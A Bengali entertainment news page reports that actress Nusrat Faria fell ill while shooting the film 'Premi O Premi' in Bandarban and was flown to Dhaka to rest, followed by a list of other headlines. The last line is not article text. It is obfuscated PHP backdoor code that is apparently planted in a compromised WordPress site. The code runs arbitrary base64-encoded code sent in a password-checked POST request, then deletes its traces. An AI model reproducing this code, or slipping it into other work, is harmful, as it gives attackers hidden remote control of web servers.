বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

বিরতিহীন শুটিংয়ে অসুস্থ নুসরাত ফারিয়া

1439565399_4বিনোদন প্রতিবেদক : জাজ মাল্টিমিডিয়া প্রযোজিত ‘প্রেমী ও প্রেমী’ ছবির শুটিং করতে গিয়ে হঠাৎ অসুস্থ হয়ে পড়েছেন চিত্রনায়িকা নুসরাত ফারিয়া। শুক্রবার তাকে বান্দরবান থেকে দ্রুত ঢাকায় নিয়ে আসা হয়েছে। ফলে বন্ধ হয়ে গেছে ‘প্রেমি ও প্রেমি’ ছবির শুটিং। বাংলামেইলকে এসব তথ্য নিশ্চিত করেছেন নির্মাতা জাকির হোসেন রাজু।

৪ জুন থেকে বান্দরবানে শুরু হয় ‘প্রেমী ও প্রেমী’র চিত্রধারণের কাজ। প্রথমদিন থেকেই পুরোদমে শুটিংয়ে অংশ নেন ছবির প্রধান পাত্রপাত্রী নুসরাত ফারিয়া ও আরিফিন শুভ। কিন্তু দ্বিতীয় দিনে হঠাৎ অসুস্থ হয়ে পড়েন ফারিয়া। স্থানীয় চিকিৎসকের পরামর্শে বিশ্রাম নিয়ে আবার কাজ শুরু করেন তিনি। কিন্তু শুক্রবার আবার অসুস্থ হয়ে পড়লে, চিকিৎসকের পরামর্শে ফারিয়াকে ঢাকায় নিয়ে আসা হয়।

শুক্রবার রাতে বান্দরবান থেকে চট্টগ্রাম হয়ে বিমানযোগে ঢাকায় নিয়ে আসা হয়েছে ফারিয়াকে। চিকিৎসকের পরামর্শে সপ্তাহখানিক তাকে বিশ্রাম দেয়া হয়েছে। ফারিয়ার সঙ্গে ছবির পুরো ইউনিটও ঢাকায় ফিরে এসেছে।

খোঁজ নিয়ে জানা যায়, জাজ মাল্টিমিডিয়ার ‘বাদশা দ্য ডন’ ছবির কাজে লন্ডন থেকে ভারতে বেশ দৌড়াদৌড়ি করতে হয়েছে ফারিয়াকে। ঢাকায় ফিরে বিশ্রাম না নিয়েই আবার ‘প্রেমি ও প্রেমি’র কাজে যোগ দেন তিনি। মূলত বিরতিহীন শুটিং করতে গিয়েই অসুস্থ হয়ে পড়েছেন ফারিয়া। তিনি সুস্থ হলে ছবির কাজ আবার শুরু হবে।

এ জাতীয় আরও খবর

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

জীবিকার তাগিদ ঘরে ফিরতে দেয়নি তাদের

ঝলসে যাওয়া তাপমাত্রায় পুড়ছেন হজযাত্রীরা, বাড়ছে হতাহত

কবি অসীম সাহা আর নেই

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}